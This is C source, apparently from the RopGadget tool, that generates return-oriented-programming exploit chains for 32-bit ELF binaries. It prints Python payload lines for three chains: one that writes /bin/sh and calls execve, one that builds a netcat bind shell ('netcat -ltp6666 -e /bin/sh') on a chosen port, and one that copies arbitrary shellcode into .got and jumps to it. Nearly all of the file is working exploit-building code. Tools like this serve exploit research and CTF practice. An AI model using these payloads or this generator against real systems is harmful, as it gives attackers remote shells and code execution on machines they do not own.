void combo_ropmaker2(void) { int i = 0; int flag = 0; Elf32_Addr addr; t_makecode *list_ins = NULL; /* check combo 1 if possible */ while (tab_combo_ropsh2[i].instruction) { if (search_instruction(tab_combo_ropsh2[i].instruction) == 0) { flag = 1; break; } i++; } if (flag == 0) fprintf(stdout, "[%s+%s] Combo 1 was found - Possible with the following gadgets. (execve)\n", GREEN, ENDC); else fprintf(stderr, "[%s-%s] Combo 1 was not found, missing instruction(s).\n", RED, ENDC); i = 0; while (tab_combo_ropsh2[i].instruction) { addr = search_instruction(tab_combo_ropsh2[i].instruction); if (addr) { fprintf(stdout, "\t- %s0x%.8x%s => %s%s%s\n", GREEN, addr, ENDC, GREEN, get_gadget_since_addr(addr), ENDC); if (!flag) list_ins = add_element(list_ins, get_gadget_since_addr_att(addr), addr); } else fprintf(stdout, "\t- %s..........%s => %s%s%s\n", RED, ENDC, RED, tab_combo_ropsh2[i].instruction, ENDC); i++; } fprintf(stdout, "\t- %s0x%.8x%s => %s.data Addr%s\n", GREEN, Addr_sData, ENDC, GREEN, ENDC); /* build a python code */ if (!flag) makecode(list_ins); }
/* partie 1 | write /bin/sh in .data for execve("/bin/sh", NULL, NULL)*/ static void makepartie1_local(t_makecode *list_ins) { Elf32_Addr addr_mov_gadget; Elf32_Addr addr_xor_gadget; Elf32_Addr addr_pop_stack_gadget; Elf32_Addr addr_pop_binsh_gadget; char *mov_gadget; char *xor_gadget; char *pop_stack_gadget; char *pop_binsh_gadget; char *first_reg; char *second_reg; char reg_stack[32] = "pop %"; char reg_binsh[32] = "pop %"; char instr_xor[32] = "xor %"; addr_mov_gadget = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)"); mov_gadget = get_gadget_since_addr_att(addr_mov_gadget); first_reg = get_first_reg(mov_gadget); second_reg = get_second_reg(mov_gadget); strncat(reg_stack, second_reg, 3); strncat(reg_binsh, first_reg, 3); strncat(instr_xor, first_reg, 3); addr_pop_stack_gadget = ret_addr_makecodefunc(list_ins, reg_stack); pop_stack_gadget = get_gadget_since_addr_att(addr_pop_stack_gadget); addr_pop_binsh_gadget = ret_addr_makecodefunc(list_ins, reg_binsh); pop_binsh_gadget = get_gadget_since_addr_att(addr_pop_binsh_gadget); addr_xor_gadget = ret_addr_makecodefunc(list_ins, instr_xor); xor_gadget = get_gadget_since_addr(addr_xor_gadget); fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC); fprintf(stdout, "\t\t%s# execve /bin/sh generated by RopGadget v3.4.2%s\n", BLUE, ENDC); /*****************\/bin*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"/bin\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /*****************\//sh*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 4%s\n", BLUE, Addr_sData + 4, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"//sh\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ free(first_reg); free(second_reg); }
/* partie 1 bis | write //usr/bin/netcat -ltp6666 -e///bin//sh in .data */ static void makepartie1_remote(t_makecode *list_ins) { Elf32_Addr addr_mov_gadget; Elf32_Addr addr_xor_gadget; Elf32_Addr addr_pop_stack_gadget; Elf32_Addr addr_pop_binsh_gadget; char *mov_gadget; char *xor_gadget; char *pop_stack_gadget; char *pop_binsh_gadget; char *first_reg; char *second_reg; char reg_stack[32] = "pop %"; char reg_binsh[32] = "pop %"; char instr_xor[32] = "xor %"; addr_mov_gadget = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)"); mov_gadget = get_gadget_since_addr_att(addr_mov_gadget); first_reg = get_first_reg(mov_gadget); second_reg = get_second_reg(mov_gadget); strncat(reg_stack, second_reg, 3); strncat(reg_binsh, first_reg, 3); strncat(instr_xor, first_reg, 3); addr_pop_stack_gadget = ret_addr_makecodefunc(list_ins, reg_stack); pop_stack_gadget = get_gadget_since_addr_att(addr_pop_stack_gadget); addr_pop_binsh_gadget = ret_addr_makecodefunc(list_ins, reg_binsh); pop_binsh_gadget = get_gadget_since_addr_att(addr_pop_binsh_gadget); addr_xor_gadget = ret_addr_makecodefunc(list_ins, instr_xor); xor_gadget = get_gadget_since_addr(addr_xor_gadget); fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC); fprintf(stdout, "\t\t%s# execve /bin/sh bindport %s generated by RopGadget v3.4.2%s\n", BLUE, bind_mode.port, ENDC); /*****************\//us*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"//us\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************r/bi*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 4%s\n", BLUE, Addr_sData + 4, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"r/bi\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /*****************\n/ne*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"n/ne\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************tcat*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 12%s\n", BLUE, Addr_sData + 12, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"tcat\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 16%s\n", BLUE, Addr_sData + 16, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ /******************-ltp*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 17%s\n", BLUE, Addr_sData + 17, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"-ltp\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************<PORT>*******************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 21%s\n", BLUE, Addr_sData + 21, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, bind_mode.port, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 25%s\n", BLUE, Addr_sData + 25, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ /******************-e//\********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 26%s\n", BLUE, Addr_sData + 26, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"-e//\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /*****************\/bin*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 30%s\n", BLUE, Addr_sData + 30, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"/bin\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\//sh********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 34%s\n", BLUE, Addr_sData + 34, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"//sh\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 38%s\n", BLUE, Addr_sData + 38, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ /*********************************** make now arg_tab[] ***********************************/ /* ** data + 0 = "//usr/bin/netcat" ** data + 17 = "-ltp6666" ** data + 26 = "-e///bin//sh" ** ^ ** +-- data + 38 ** ** data + 40 = data + 0 ** data + 44 = data + 17 ** data + 48 = data + 26 ** data + 52 = NULL */ /****************** data + 0 ********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 40%s\n", BLUE, Addr_sData + 40, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************* EOF **********************/ /****************** data + 17 ********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 44%s\n", BLUE, Addr_sData + 44, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 17%s\n", BLUE, Addr_sData + 17, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************* EOF **********************/ /****************** data + 17 ********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 48%s\n", BLUE, Addr_sData + 48, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 26%s\n", BLUE, Addr_sData + 26, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************* EOF **********************/ /****************** \0 [1] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 52%s\n", BLUE, Addr_sData + 52, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /****************** \0 [2] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 53%s\n", BLUE, Addr_sData + 53, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /****************** \0 [3] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 54%s\n", BLUE, Addr_sData + 54, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /****************** \0 [4] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 55%s\n", BLUE, Addr_sData + 55, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /**************************************** EOF *********************************************/ free(first_reg); free(second_reg); }
/* partie 1 | import shellcode in ROP instruction */ static void makepartie1_importsc(t_makecode *list_ins, int useless, char *pop_reg) { /* gad1 pop %e?x gad2 mov (%e?x),%e?x gad3 mov %e?x,%e?x gad4 mov %e?x,(%e?x) */ int i = 0; Elf32_Addr addr_gad1; Elf32_Addr addr_gad2; Elf32_Addr addr_gad3; Elf32_Addr addr_gad4; char *gad1; char *gad2; char *gad3; char *gad4; addr_gad1 = ret_addr_makecodefunc(list_ins, pop_reg); gad1 = get_gadget_since_addr(addr_gad1); addr_gad2 = ret_addr_makecodefunc(list_ins, "mov (%e?x),%e?x"); gad2 = get_gadget_since_addr(addr_gad2); addr_gad3 = ret_addr_makecodefunc(list_ins, "mov %e?x,%e?x"); gad3 = get_gadget_since_addr(addr_gad3); addr_gad4 = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)"); gad4 = get_gadget_since_addr(addr_gad4); /* check if all opcodes about shellcode was found in .text */ if (checkOpcodeWasFound() == FALSE) { fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC); fprintf(stdout, "\t%s/!\\ Impossible to generate your shellcode because some opcode was not found.%s\n", RED, ENDC); return ; } fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC); fprintf(stdout, "\t\t%s# Shellcode imported! Generated by RopGadget v3.4.2%s\n", BLUE, ENDC); while (importsc_mode.poctet->next != NULL) importsc_mode.poctet = importsc_mode.poctet->next; while (i != importsc_mode.size && importsc_mode.poctet != NULL) { /* pop %edx */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC); display_padding(how_many_pop_before(gad1, pop_reg)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ 0x%.2x%s\n", BLUE, importsc_mode.poctet->addr, importsc_mode.poctet->octet, ENDC); display_padding(how_many_pop_after(gad1, pop_reg)); /* mov (%edx),%ecx */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad2, gad2, ENDC); display_padding(how_many_pop(gad2)); if (useless < 0) { /* mov %ecx,%eax */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad3, gad3, ENDC); display_padding(how_many_pop(gad3)); } /* pop %edx */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC); display_padding(how_many_pop_before(gad1, pop_reg)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .got + %d%s\n", BLUE, Addr_sGot + i, i, ENDC); display_padding(how_many_pop_after(gad1, pop_reg)); /* mov %eax,(%edx) */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad4, gad4, ENDC); display_padding(how_many_pop(gad4)); importsc_mode.poctet = importsc_mode.poctet->back; i++; } fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # jump to our shellcode in .got%s\n", BLUE, Addr_sGot , ENDC); }